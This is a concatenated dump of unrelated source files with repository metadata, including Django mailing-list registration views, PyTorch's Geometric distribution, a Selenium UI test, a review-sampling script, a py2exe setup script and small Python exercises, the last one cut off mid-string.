field=models.DateTimeField(default=django.utils.timezone.now),
),
]
|
[
"coolahmed21@example.com"
] |
coolahmed21@example.com
|
9ff12a83fa349c141961c33c8bda172be333ee74
|
89108805110edac6d07de41130a9bc45d62efb9d
|
/mailinglist_registration/backends/messages/views.py
|
7e5ac56aa132db7d8dfe58368d69d8731b85b4c5
|
[
"BSD-3-Clause"
] |
permissive
|
danielpatrickdotdev/django-mailinglist-registration
|
7824aaa6232ebfe5de5e3dc65a19cc707b6b4686
|
756c4ac2052063249b66eaa4c153694a5fb3eba1
|
refs/heads/master
| 2021-05-27T17:56:54.917761
| 2013-07-13T12:29:01
| 2013-07-13T12:29:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,919
|
py
|
from django.conf import settings
from django.shortcuts import redirect
from django.contrib.sites.models import RequestSite, Site
from django.contrib import messages
from django.views.generic.base import TemplateView
from mailinglist_registration import signals
from mailinglist_registration.models import RegistrationProfile, Subscriber
from mailinglist_registration.views import ActivationView as BaseActivationView
from mailinglist_registration.views import RegistrationView as BaseRegistrationView
class RegistrationView(BaseRegistrationView):
def register(self, request, **cleaned_data):
"""
Given an email address, register a new subscriber, which will
initially be inactive.
Along with the new ``Subscriber`` object, a new
``mailinglist_registration.models.RegistrationProfile`` will be created,
tied to that ``Subscriber``, containing the activation key which
will be used for this account.
An email will be sent to the supplied email address; this
email should contain an activation link. The email will be
rendered using two templates. See the documentation for
``RegistrationProfile.send_activation_email()`` for
information about these templates and the contexts provided to
them.
After the ``Subscriber`` and ``RegistrationProfile`` are created and
the activation email is sent, the signal
``mailinglist_registration.signals.subscriber_registered`` will
be sent, with the new ``Subscriber`` as the keyword argument
``subscriber`` and the class of this backend as the sender.
"""
email = cleaned_data['email']
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
subscriber = RegistrationProfile.objects.create_inactive_subscriber(email, site)
signals.subscriber_registered.send(sender=self.__class__,
subscriber=subscriber,
request=request)
return subscriber
def registration_allowed(self, request):
"""
In order to keep this backend simple, registration is always open.
"""
return True
def form_valid(self, request, form):
new_subscriber = self.register(request, **form.cleaned_data)
success_url = self.get_success_url(request, new_subscriber)
messages.info(self.request,"Thanks for signing up to our updates! Please check your emails to confirm your email address.")
# success_url may be a simple string, or a tuple providing the
# full argument set for redirect(). Attempting to unpack it
# tells us which one it is.
try:
to, args, kwargs = success_url
return redirect(to, *args, **kwargs)
except ValueError:
return redirect(success_url)
class ActivationView(TemplateView):
"""
Base class for subscriber activation views.
"""
success_url = None
http_method_names = ['get']
def get(self, request, *args, **kwargs):
activated_subscriber = self.activate(request, *args, **kwargs)
if activated_subscriber:
messages.success(request,"Your email address has been confirmed. Thank you for subscribing to our updates!")
success_url = self.get_success_url(request, activated_subscriber)
try:
to, args, kwargs = success_url
return redirect(to, *args, **kwargs)
except ValueError:
return redirect(success_url)
else:
messages.error(request,"Hmm. Something went wrong somewhere. Maybe the activation link expired?")
success_url = self.get_success_url(request, activated_subscriber)
return redirect(success_url)
def activate(self, request, activation_key):
"""
Given an activation key, look up and activate the subscriber
account corresponding to that key (if possible).
After successful activation, the signal
``mailinglist_registration.signals.subscriber_activated`` will be sent, with the
newly activated ``Subscriber`` as the keyword argument ``subscriber`` and
the class of this backend as the sender.
"""
activated_subscriber = RegistrationProfile.objects.activate_subscriber(activation_key)
if activated_subscriber:
signals.subscriber_activated.send(sender=self.__class__,
subscriber=activated_subscriber,
request=request)
return activated_subscriber
def get_success_url(self, request, subscriber):
return self.success_url
class DeRegistrationView(TemplateView):
success_url = None
def get(self, request, deactivation_key, *args, **kwargs):
"""
Given a deactivation key, look up and deactivate the subscriber
account corresponding to that key (if possible).
After successful deactivation, the signal
``mailinglist_registration.signals.subscriber_deactivated`` will be sent, with the
email of the deactivated ``Subscriber`` as the keyword argument ``email`` and
the class of this backend as the sender.
"""
email = Subscriber.objects.deactivate_subscriber(deactivation_key)
if email:
signals.subscriber_deactivated.send(sender=self.__class__,
email=email,
request=request)
messages.info(request,"Your email address has been removed from our mailing list.")
else:
messages.error(request,"Are you sure you typed that URL correctly?")
return redirect(self.success_url)
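# A hedged URLconf sketch showing how these views are typically wired up
# (URL patterns, names, and success_url values are invented):
#
# urlpatterns = [
#     url(r'^register/$',
#         RegistrationView.as_view(success_url='/'), name='register'),
#     url(r'^activate/(?P<activation_key>\w+)/$',
#         ActivationView.as_view(success_url='/'), name='activate'),
#     url(r'^unsubscribe/(?P<deactivation_key>\w+)/$',
#         DeRegistrationView.as_view(success_url='/'), name='unsubscribe'),
# ]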
|
[
"danielpatrick@hotmail.com"
] |
danielpatrick@hotmail.com
|
8bab37daf96d71aa280e74d681d7515f1291bf03
|
c9f67529e10eb85195126cfa9ada2e80a834d373
|
/lib/python3.5/site-packages/torch/distributions/geometric.py
|
1e4b121cd7b4cfcccd548bf86ff634e3392b7ebe
|
[
"Apache-2.0"
] |
permissive
|
chilung/dllab-5-1-ngraph
|
10d6df73ea421bfaf998e73e514972d0cbe5be13
|
2af28db42d9dc2586396b6f38d02977cac0902a6
|
refs/heads/master
| 2022-12-17T19:14:46.848661
| 2019-01-14T12:27:07
| 2019-01-14T12:27:07
| 165,513,937
| 0
| 1
|
Apache-2.0
| 2022-12-08T04:59:31
| 2019-01-13T14:19:16
|
Python
|
UTF-8
|
Python
| false
| false
| 2,923
|
py
|
from numbers import Number
import torch
from torch.distributions import constraints
from torch.distributions.distribution import Distribution
from torch.distributions.utils import broadcast_all, probs_to_logits, logits_to_probs, lazy_property, _finfo
from torch.nn.functional import binary_cross_entropy_with_logits
class Geometric(Distribution):
r"""
Creates a Geometric distribution parameterized by `probs`, where `probs` is the probability of success of Bernoulli
trials. It represents the probability that in k + 1 Bernoulli trials, the first k trials fail before
a success is seen.
Samples are non-negative integers [0, inf).
Example::
>>> m = Geometric(torch.tensor([0.3]))
>>> m.sample() # underlying Bernoulli has 30% chance 1; 70% chance 0
2
[torch.FloatTensor of size 1]
Args:
probs (Number, Tensor): the probability of sampling `1`. Must be in range (0, 1]
logits (Number, Tensor): the log-odds of sampling `1`.
"""
arg_constraints = {'probs': constraints.unit_interval}
support = constraints.nonnegative_integer
def __init__(self, probs=None, logits=None, validate_args=None):
if (probs is None) == (logits is None):
raise ValueError("Either `probs` or `logits` must be specified, but not both.")
if probs is not None:
self.probs, = broadcast_all(probs)
if not self.probs.gt(0).all():
raise ValueError('All elements of probs must be greater than 0')
else:
self.logits, = broadcast_all(logits)
probs_or_logits = probs if probs is not None else logits
if isinstance(probs_or_logits, Number):
batch_shape = torch.Size()
else:
batch_shape = probs_or_logits.size()
super(Geometric, self).__init__(batch_shape, validate_args=validate_args)
@property
def mean(self):
return 1. / self.probs - 1.
@property
def variance(self):
return (1. / self.probs - 1.) / self.probs
@lazy_property
def logits(self):
return probs_to_logits(self.probs, is_binary=True)
@lazy_property
def probs(self):
return logits_to_probs(self.logits, is_binary=True)
def sample(self, sample_shape=torch.Size()):
shape = self._extended_shape(sample_shape)
with torch.no_grad():
u = self.probs.new(shape).uniform_(_finfo(self.probs).tiny, 1)
return (u.log() / (-self.probs).log1p()).floor()
def log_prob(self, value):
if self._validate_args:
self._validate_sample(value)
value, probs = broadcast_all(value, self.probs.clone())
probs[(probs == 1) & (value == 0)] = 0
return value * (-probs).log1p() + self.probs.log()
def entropy(self):
return binary_cross_entropy_with_logits(self.logits, self.probs, reduce=False) / self.probs
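# A short usage sketch (hedged: the probability is arbitrary):
#
# >>> m = Geometric(torch.tensor([0.3]))
# >>> s = m.sample((5,))      # five draws of "failures before first success"
# >>> m.log_prob(s)           # elementwise log-probabilities
# >>> m.mean, m.variance      # (1 - p) / p and (1 - p) / p**2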
|
[
"chilung.cs06g@nctu.edu.tw"
] |
chilung.cs06g@nctu.edu.tw
|
ddd780af0f467b3e365ab91cc4e73b3afe4f785c
|
b58c3f5b69772d5383727b8257536ab41a29cd02
|
/testsuites/test03_shopmanage.py
|
c3344499a4f13305952624af0de7a9e677e12957
|
[] |
no_license
|
pwxing/LinkeDs
|
b25fe937100b352f00f152306f7b15691c69f41e
|
2f996a70cd611eef27a826ae7ded38104e292374
|
refs/heads/master
| 2021-05-07T18:36:27.877468
| 2017-11-02T12:20:34
| 2017-11-02T12:20:34
| 108,817,025
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,936
|
py
|
# coding=utf-8
import time
import unittest
from framework.browser_engine import BrowserEngine
from framework.base_page import BasePage
from pageobjects.linke_loginpage import LoginPage
from pageobjects.linke_homepage import LinkeHomePage
from pageobjects.ds_shopmanage import ShopManage
import pageobjects
class ShopManageTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
browse = BrowserEngine(cls)
cls.driver = browse.open_browser(cls)
@classmethod
def tearDownClass(cls):
# cls.driver.quit()
pass
def test_ds_menu001(self):
# self.login()
loginpage = LoginPage(self.driver)
loginpage.login()
time.sleep(1)
loginpage.get_windows_img()  # call the screenshot helper from the base class
# click the e-commerce button
linkehomepage = LinkeHomePage(self.driver)
time.sleep(1)
linkehomepage.send_ds_link_btn()
time.sleep(1)
shopmanage = ShopManage(self.driver)
print(shopmanage.get_y_order_text())
print(shopmanage.get_y_amount_text())
print(shopmanage.get_no_send_text())
print(shopmanage.get_prepare_goods_text())
print(shopmanage.get_refund_text())
shopmanage.click_y_order()
time.sleep(1)
self.driver.back()
time.sleep(1)
shopmanage.click_ds_info()
time.sleep(1)
shopmanage.click_ds_info()
# select the query time range
shopmanage.type_select_query_time(u"近一周")
time.sleep(2)
shopmanage.type_select_query_time(u"近一月")
time.sleep(2)
shopmanage.type_select_query_time(u"昨天")
time.sleep(2)
shopmanage.type_select_query_time(u"自定义时间")
time.sleep(2)
shopmanage.type_cus_time("2017-07-20", "2017-07-25")
time.sleep(1)
shopmanage.click_query_btn()
time.sleep(2)
if __name__ == '__main__':
unittest.main()
|
[
"xiongzh@hyxt.com"
] |
xiongzh@hyxt.com
|
66232ac70c2956a0cdd7e2de1e6855bd119e53dc
|
1d7147717ed51c34d09e2f68dbb9c746245b147d
|
/L2C1_project1.py
|
41a63402d6406d1ff1fa10de3b486ec6827f66ba
|
[] |
no_license
|
aaryanredkar/prog4everybody
|
987e60ebabcf223629ce5a80281c984d1a7a7ec2
|
67501b9e9856c771aea5b64c034728644b25dabe
|
refs/heads/master
| 2020-05-29T18:12:33.644086
| 2017-02-13T02:46:44
| 2017-02-13T02:46:44
| 46,829,424
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 90
|
py
|
x = int(input("Please enter an integer:"))
print()
for i in range(0, x + 1):
    print(i)
|
[
"aaryantoki@live.com"
] |
aaryantoki@live.com
|
380d17872d9ed8769bac3610758bd177dacef41e
|
49b9c68ab746cb43770fd35771847bd9c18817e6
|
/recsys/experiment/sampler.py
|
f5ab7aa89849497d96e70142acbc65112590a16a
|
[] |
no_license
|
kobauman/signature
|
06a2c579381faa780d79ab3e662c6ec6d28b8555
|
d123ff1557b9d3f81ef7ce7a0a83ea81d614675b
|
refs/heads/master
| 2021-01-21T12:11:42.419877
| 2016-03-25T19:48:08
| 2016-03-25T19:48:08
| 22,729,978
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,290
|
py
|
import logging
import random
import json
import os
'''
Sample TRAIN and TEST
Input: reviews, prob
Output: list of reviews in TEST
'''
def sampler(path, reviews_filename, probs = [0.4, 0.8], busThres = 0, userThres = 0):
logger = logging.getLogger('signature.sampler')
logger.info('starting sampling')
#load reviews
review_file = open(reviews_filename,"r")
bus_info = dict()
user_info = dict()
reviews = list()
for counter, line in enumerate(review_file):
reviews.append(json.loads(line))
busId = reviews[-1]['business_id']
userId = reviews[-1]['user_id']
bus_info[busId] = bus_info.get(busId,0)
bus_info[busId]+=1
user_info[userId] = user_info.get(userId,0)
user_info[userId]+=1
if not counter % 10000:
logger.info('%d reviews processed'%counter)
review_file.close()
r_num = len(reviews)
#clean by business
good_bus = set([bus for bus in bus_info if bus_info[bus] > busThres])
reviews = [review for review in reviews if review['business_id'] in good_bus]
good_user = set([user for user in user_info if user_info[user] > userThres])
reviews = [review for review in reviews if review['user_id'] in good_user]
logger.info('Num of businesses before = %d, after = %d'%(len(bus_info),len(good_bus)))
logger.info('Num of users before = %d, after = %d'%(len(user_info),len(good_user)))
logger.info('Num of reviews before = %d, after = %d'%(r_num,len(reviews)))
#shuffle
random.shuffle(reviews)
thres1 = len(reviews)*probs[0]
thres2 = len(reviews)*probs[1]
train_filename = reviews_filename.replace('_features.json','_train.json')
stat_filename = reviews_filename.replace('_features.json','_stat.json')
extrain_filename = reviews_filename.replace('_features.json','_extrain.json')
test_filename = reviews_filename.replace('_features.json','_test.json')
train_file = open(train_filename,"w")
stat_file = open(stat_filename,"w")
extrain_file = open(extrain_filename,"w")
test_file = open(test_filename,"w")
counters = [0,0,0,0]
for counter, review in enumerate(reviews):
review = json.dumps(review)
if counter < thres2:
train_file.write(review+'\n')
counters[0] += 1
if counter < thres1:
stat_file.write(review+'\n')
counters[1] += 1
elif counter < thres2:
extrain_file.write(review+'\n')
counters[2] += 1
else:
test_file.write(review+'\n')
counters[3] += 1
train_file.close()
stat_file.close()
extrain_file.close()
test_file.close()
logger.info('DONE %s'%str(counters))
if not os.path.exists(path + 'results/'):
    os.mkdir(path + 'results/')
outfile = open(path+'results/Numbers_stat.txt','w')
outfile.write('Businesses only with > %d reviews\nUsers only with > %d reviews'%(busThres,userThres))
outfile.write('\nTrain: %d,\n Stat: %d,\nExtrain: %d,\nTest: %d'%(counters[0],counters[1],counters[2],counters[3]))
outfile.close()
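# A minimal invocation sketch (hedged: the path and filename are invented;
# the input must hold one JSON review per line with business_id and user_id
# keys, and its name must end in '_features.json' for the output renaming
# above to work):
#
# sampler('data/', 'data/reviews_features.json',
#         probs=[0.4, 0.8], busThres=5, userThres=2)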
|
[
"kbauman@yandex.ru"
] |
kbauman@yandex.ru
|
3387a7b1ab5c092a4be3f73958c4f37a2aec6a5c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02683/s728076842.py
|
530d406c4a8a8bf681c980d60d4d26bc44d72770
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
import numpy as np
n, m, x = map(int, input().split())
a = 2 ** 64  # best cost so far; 2**64 stands in for infinity
# Each row: [cost, skill_1, ..., skill_m]
b = [np.array(list(map(int, input().split())), "i8") for i in range(n)]
# Enumerate every subset of the n books as a bitmask.
for i in range(2 ** n):
    c = bin(i)[2:]
    c = "0" * (n - len(c)) + c  # zero-pad the mask to n digits
    l = np.zeros(m)  # accumulated skill levels
    q = 0  # accumulated cost
    for j in range(n):
        if c[j] == "1":
            q += b[j][0]
            l += b[j][1:]
    # The subset is valid only if every skill reaches at least x.
    if np.min(l) >= x:
        a = min(a, q)
if a == 2 ** 64:
    print(-1)
else:
    print(a)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
7d4360c378c244e4834437c6bf0bbf020e1885ff
|
b85bca40004f9d1737fb4d342e8ea040eefb453b
|
/tests/lgdo/test_scalar.py
|
3ff4c51833af64977b65fb3570d064c5a0fc7ac5
|
[
"Apache-2.0"
] |
permissive
|
wisecg/pygama
|
95f744af56a8df81020f195695128a5ce0a6aca6
|
9a422d73c20e729f8d014a120a7e8714685ce4db
|
refs/heads/main
| 2022-12-24T02:02:05.554163
| 2022-12-05T16:32:30
| 2022-12-05T16:32:30
| 257,975,470
| 0
| 1
|
Apache-2.0
| 2020-04-22T17:41:46
| 2020-04-22T17:41:45
| null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
import pygama.lgdo as lgdo
def test_datatype_name():
scalar = lgdo.Scalar(value=42)
assert scalar.datatype_name() == "real"
def test_form_datatype():
scalar = lgdo.Scalar(value=42)
assert scalar.form_datatype() == "real"
# TODO: check for warning if mismatched datatype
def test_init():
attrs = {"attr1": 1}
scalar = lgdo.Scalar(value=42, attrs=attrs)
assert scalar.value == 42
assert scalar.attrs == attrs | {"datatype": "real"}
|
[
"luigi.pertoldi@protonmail.com"
] |
luigi.pertoldi@protonmail.com
|
1b9d741b46cbdeed5b3a3bac485cf1c895171822
|
1d38c549c07f43cc26b7353ef95300b934eeed33
|
/setup.py
|
9475e9b22ed79c0c28f6d00f6eec5f19bf0269e4
|
[] |
no_license
|
pooyagheyami/Adel3
|
a6354fbc5aa56a9c38a8b724c8d22bea689380a1
|
29e257e19fd6914de0e60c303871321e457a858b
|
refs/heads/master
| 2022-11-07T21:53:13.958369
| 2020-06-12T13:22:55
| 2020-06-12T13:22:55
| 271,803,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,530
|
py
|
# ======================================================== #
# File automagically generated by GUI2Exe version 0.5.3
# Copyright: (c) 2007-2012 Andrea Gavana
# ======================================================== #
# Let's start with some default (for me) imports...
from distutils.core import setup
from py2exe.build_exe import py2exe
import glob
import os
import zlib
import shutil
# Remove the build folder
shutil.rmtree("build", ignore_errors=True)
class Target(object):
""" A simple class that holds information on our executable file. """
def __init__(self, **kw):
""" Default class constructor. Update as you need. """
self.__dict__.update(kw)
# Ok, let's explain why I am doing that.
# Often, data_files, excludes and dll_excludes (but also resources)
# can be very long list of things, and this will clutter too much
# the setup call at the end of this file. So, I put all the big lists
# here and I wrap them using the textwrap module.
data_files = [('GUI\AuiPanel', ['F:\\Adel2\\GUI\\AuiPanel\\__init__.pyc',
'F:\\Adel2\\GUI\\AuiPanel\\Rev.pyc',
'F:\\Adel2\\GUI\\AuiPanel\\Stat.pyc']),
('GUI\Edit', ['F:\\Adel2\\GUI\\Edit\\__init__.pyc',
'F:\\Adel2\\GUI\\Edit\\accsrh.pyc',
'F:\\Adel2\\GUI\\Edit\\buyit.pyc',
'F:\\Adel2\\GUI\\Edit\\EDA.pyc',
'F:\\Adel2\\GUI\\Edit\\Edacc.pyc',
'F:\\Adel2\\GUI\\Edit\\EDM.pyc',
'F:\\Adel2\\GUI\\Edit\\Edmolk6.pyc',
'F:\\Adel2\\GUI\\Edit\\Edmolk62.pyc',
'F:\\Adel2\\GUI\\Edit\\InAcc3.pyc',
'F:\\Adel2\\GUI\\Edit\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Edit\\Specy.pyc']),
('Database', ['F:\\Adel2\\Database\\__init__.pyc',
'F:\\Adel2\\Database\\ABR.db',
'F:\\Adel2\\Database\\Company.db',
'F:\\Adel2\\Database\\DataGet.pyc',
'F:\\Adel2\\Database\\Main.db',
'F:\\Adel2\\Database\\MDataGet.pyc',
'F:\\Adel2\\Database\\Menu.db',
'F:\\Adel2\\Database\\MenuSet.pyc',
'F:\\Adel2\\Database\\Molk.db',
'F:\\Adel2\\Database\\wxsq2.pyc']),
('GUI', ['F:\\Adel2\\GUI\\__init__.pyc',
'F:\\Adel2\\GUI\\BG.pyc',
'F:\\Adel2\\GUI\\MainMenu.pyc',
'F:\\Adel2\\GUI\\proman.pyc',
'F:\\Adel2\\GUI\\window.pyc']),
('GUI\Input', ['F:\\Adel2\\GUI\\Input\\__init__.pyc',
'F:\\Adel2\\GUI\\Input\\accsrh.pyc',
'F:\\Adel2\\GUI\\Input\\buyit.pyc',
'F:\\Adel2\\GUI\\Input\\IAc.pyc',
'F:\\Adel2\\GUI\\Input\\IMK.pyc',
'F:\\Adel2\\GUI\\Input\\InAcc3.pyc',
'F:\\Adel2\\GUI\\Input\\InM6.pyc',
'F:\\Adel2\\GUI\\Input\\InMolk61.pyc',
'F:\\Adel2\\GUI\\Input\\InMolk62.pyc',
'F:\\Adel2\\GUI\\Input\\Pmenu.pyc',
'F:\\Adel2\\GUI\\Input\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Input\\Specy.pyc']),
('GUI\Program', ['F:\\Adel2\\GUI\\Program\\quit.pyc',
'F:\\Adel2\\GUI\\Program\\DEF.pyc',
'F:\\Adel2\\GUI\\Program\\defin2.pyc',
'F:\\Adel2\\GUI\\Program\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Program\\pro1.pyc',
'F:\\Adel2\\GUI\\Program\\proper.pyc']),
('GUI\Report', ['F:\\Adel2\\GUI\\Report\\__init__.pyc',
'F:\\Adel2\\GUI\\Report\\AD1.pyc',
'F:\\Adel2\\GUI\\Report\\ADftar.pyc',
'F:\\Adel2\\GUI\\Report\\buyit.pyc',
'F:\\Adel2\\GUI\\Report\\MD1.pyc',
'F:\\Adel2\\GUI\\Report\\MD2.pyc',
'F:\\Adel2\\GUI\\Report\\MDftar1.pyc',
'F:\\Adel2\\GUI\\Report\\MDftar4.pyc',
'F:\\Adel2\\GUI\\Report\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Report\\RMolk61.pyc',
'F:\\Adel2\\GUI\\Report\\RMolk62.pyc',
'F:\\Adel2\\GUI\\Report\\Specy.pyc']),
('GUI\Develop', ['F:\\Adel2\\GUI\\Develop\\__init__.pyc',
'F:\\Adel2\\GUI\\Develop\\buyit.pyc',
'F:\\Adel2\\GUI\\Develop\\Pnl0.pyc']),
('GUI\Help', ['F:\\Adel2\\GUI\\Help\\__init__.pyc',
'F:\\Adel2\\GUI\\Help\\about.pyc',
'F:\\Adel2\\GUI\\Help\\Pnl0.pyc']),
('GUI\Connect', ['F:\\Adel2\\GUI\\Connect\\__init__.pyc',
'F:\\Adel2\\GUI\\Connect\\buyit.pyc',
'F:\\Adel2\\GUI\\Connect\\Pnl0.pyc']),
('Config', ['F:\\Adel2\\Config\\__init__.pyc',
'F:\\Adel2\\Config\\config.pyc',
'F:\\Adel2\\Config\\Init.pyc',
'F:\\Adel2\\Config\\program.ini']),
('Utility', ['F:\\Adel2\\Utility\\__init__.pyc',
'F:\\Adel2\\Utility\\Adaad2.pyc',
'F:\\Adel2\\Utility\\adadfa1',
'F:\\Adel2\\Utility\\B1.pyc',
'F:\\Adel2\\Utility\\barcode.png',
'F:\\Adel2\\Utility\\calcu.pyc',
'F:\\Adel2\\Utility\\calculator.bmp',
'F:\\Adel2\\Utility\\calfar01.pyc',
'F:\\Adel2\\Utility\\clacal3.pyc',
'F:\\Adel2\\Utility\\fakey.pyc'])]
includes = ['khayyam', 'wx', 'wx.dataview', 'wx.lib']
excludes = ['_gtkagg', '_tkagg', 'bsddb', 'curses', 'email', 'pywin.debugger',
'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl',
'Tkconstants', 'Tkinter']
packages = ['Config', 'Database', 'GUI', 'GUI.AuiPanel', 'GUI.Connect',
'GUI.Develop', 'GUI.Edit', 'GUI.Help', 'GUI.Input',
'GUI.Program', 'GUI.Report', 'Utility']
dll_excludes = ['libgdk-win32-2.0-0.dll', 'libgobject-2.0-0.dll', 'tcl84.dll',
'tk84.dll']
icon_resources = [(1, 'F:\\Adel2\\Res\\Icons\\f4.ico'), (2, 'F:\\Adel2\\Res\\Icons\\U5.ico')]
bitmap_resources = [(1, 'F:\\Adel2\\Utility\\calculator.bmp')]
other_resources = [(4, 24, 'F:\\Adel2\\Res\\Pics\\B10.jpg'), (5, 24, 'F:\\Adel2\\Res\\Pics\\B11.jpg'),
(6, 24, 'F:\\Adel2\\Res\\Pics\\B13.jpg'),
(7, 24, 'F:\\Adel2\\Res\\Pics\\B14.jpg'),
(8, 24, 'F:\\Adel2\\Res\\Pics\\B16.jpg'),
(1, 24, 'F:\\Adel2\\Res\\Pics\\B6.jpg'),
(2, 24, 'F:\\Adel2\\Res\\Pics\\B7.jpg'),
(3, 24, 'F:\\Adel2\\Res\\Pics\\B8.jpg')]
# This is a place where the user custom code may go. You can do almost
# whatever you want, even modify the data_files, includes and friends
# here as long as they have the same variable name that the setup call
# below is expecting.
# No custom code added
# Ok, now we are going to build our target class.
# I chose this building strategy as it works perfectly for me :-D
GUI2Exe_Target_1 = Target(
# what to build
script = "mainpro.py",
icon_resources = icon_resources,
bitmap_resources = bitmap_resources,
other_resources = other_resources,
dest_base = "mainpro",
version = "0.1",
company_name = "Chashme",
copyright = "Cheshme",
name = "Py2Exe Sample File",
)
# No custom class for UPX compression or Inno Setup script
# That's serious now: we have all (or almost all) the options py2exe
# supports. I put them all even if some of them are usually defaulted
# and not used. Some of them I didn't even know about.
setup(
# No UPX or Inno Setup
data_files = data_files,
options = {"py2exe": {"compressed": 0,
"optimize": 0,
"includes": includes,
"excludes": excludes,
"packages": packages,
"dll_excludes": dll_excludes,
"bundle_files": 3,
"dist_dir": "dist",
"xref": False,
"skip_archive": False,
"ascii": False,
"custom_boot_script": '',
}
},
zipfile = None,
console = [],
windows = [GUI2Exe_Target_1],
service = [],
com_server = [],
ctypes_com_server = []
)
# This is a place where any post-compile code may go.
# You can add as much code as you want, which can be used, for example,
# to clean up your folders or to do some particular post-compilation
# actions.
# No post-compilation code added
# And we are done. That's a setup script :-D
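# A note on how a script like this is invoked (standard py2exe usage, not
# specific to this project): running it with the py2exe command builds the
# executable into the "dist" folder configured above, e.g.
#
#   python setup.py py2exe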
|
[
"pooyagheyami@gmail.com"
] |
pooyagheyami@gmail.com
|
fcaf5d0a55c1039dcaa09d5b5481a8e32e5b4f85
|
52d77c903a5f00fd55985394cd17ee380aaf3ccf
|
/script/Utils.py
|
bdba0a8a74c2251dc082020e61e7724bc1dae669
|
[] |
no_license
|
alexanderflorean/BSc-JavSoCoClassifier
|
7b60ac5df6860c2ec1d7a47fddfba3f14b105b84
|
a6fe7a6fec06beca9f2940cf9c2cdd08bbdaab1a
|
refs/heads/main
| 2023-04-26T06:09:04.250918
| 2021-06-08T13:04:33
| 2021-06-08T13:04:33
| 349,335,825
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,936
|
py
|
import yaml
# minimum of available 5 test files regardless of training size.
MIN_NUM_OF_TEST_FILES = 5
def remove_label_column_from_dataframe(dataFrame, label):
    # Keep only the rows whose Label is NOT in `label`.
    return dataFrame[~dataFrame["Label"].isin(label)].reset_index(drop=True)
def remove_concerns_under_quantity_threshold(dataFrame, minNumOfFiles=5):
labels = dataFrame.Label.unique()
x_quantity = [len(dataFrame.loc[dataFrame["Label"] == label]) for label in labels]
to_be_removed_labels = []
for pos in range(len(labels)):
if x_quantity[pos] < minNumOfFiles + MIN_NUM_OF_TEST_FILES:
to_be_removed_labels.append(labels[pos])
return remove_label_column_from_dataframe(dataFrame, to_be_removed_labels)
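# Minimal usage sketch (assumes a pandas DataFrame with a "Label" column, as
# the functions above expect; the labels and counts here are made up):
#
#   import pandas as pd
#   df = pd.DataFrame({"Label": ["gui"] * 12 + ["io"] * 3})
#   df = remove_concerns_under_quantity_threshold(df, minNumOfFiles=5)
#   # "gui" survives (12 >= 5 + MIN_NUM_OF_TEST_FILES); "io" (3) is dropped.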
def read_yaml_file(path_to_yaml: str):
try:
with open(path_to_yaml, "r") as file:
config = yaml.safe_load(file)
return config
except Exception as e:
        print("{}: Error reading the yaml file: {}".format(e, path_to_yaml))
def make_dataframe_row(metrics, setting: list, feature_rep: str, setting_id: str) -> dict:
report = metrics.get_classification_report()
quantity_table = metrics.quantity_table()
row = {
"classifier": metrics.name,
"setting_id": setting_id,
"Feature rep.": feature_rep,
"settings": setting,
"accuracy": report["accuracy"],
"macro_precision": report["macro avg"]["precision"],
"macro_recall": report["macro avg"]["recall"],
"weighted_precision": report["weighted avg"]["precision"],
"weighted_recall": report["weighted avg"]["recall"],
"macro_f1": report["macro avg"]["f1-score"],
"weighted_f1": report["weighted avg"]["f1-score"],
"train_size": quantity_table["Train"].sum(),
"test_size": quantity_table["Test"].sum(),
"report_table": metrics.total_report_table(),
}
return row
|
[
"florean.alexander@gmail.com"
] |
florean.alexander@gmail.com
|
a037aadb28a082e3c64b0d78e14d175f29d0182b
|
779515ef9cb52d13c8f6c46623ec8906ac658452
|
/utils/emoji.py
|
436a96bd1585e415b52958284aaacfef43cc33c8
|
[
"MIT"
] |
permissive
|
Chrrapek/DiscordMiejski
|
ca014b81f4d41efe7cc9ac28913da9b29afc64e0
|
fd59433c1315baadd91a9ef29ca534924bcdc7f4
|
refs/heads/master
| 2023-04-14T20:59:44.765418
| 2021-04-12T19:18:53
| 2021-04-12T19:18:53
| 303,675,183
| 3
| 2
|
MIT
| 2021-04-12T19:18:54
| 2020-10-13T11:05:09
|
Python
|
UTF-8
|
Python
| false
| false
| 65
|
py
|
PEPE_SAD = 775061981496606740
PEPE_NAWROCKI = 775059704795758602
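# Usage sketch (assumption: these are Discord custom-emoji IDs resolved
# through a discord.py client somewhere in the bot):
#
#   emoji = client.get_emoji(PEPE_SAD)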
|
[
"janek@projmen.pl"
] |
janek@projmen.pl
|
e95bf537e32a24dacce0ab8d8e392fff4ac0c249
|
cda2cbe020f70db1bfc645973a9c1e3c62e18e92
|
/ex24.py
|
5248ea0c9a8da0dd9d98ea9ece2a571e9aa3f114
|
[] |
no_license
|
SpaceOtterInSpace/Learn-Python
|
a22c27a8fc4d955a309b8248d7e34b8957eecf24
|
3f8cc6b6212449ef3f2148e66bce9d83f23191dc
|
refs/heads/master
| 2020-04-20T16:29:46.282166
| 2015-07-07T20:04:36
| 2015-07-07T20:04:36
| 35,775,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 916
|
py
|
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
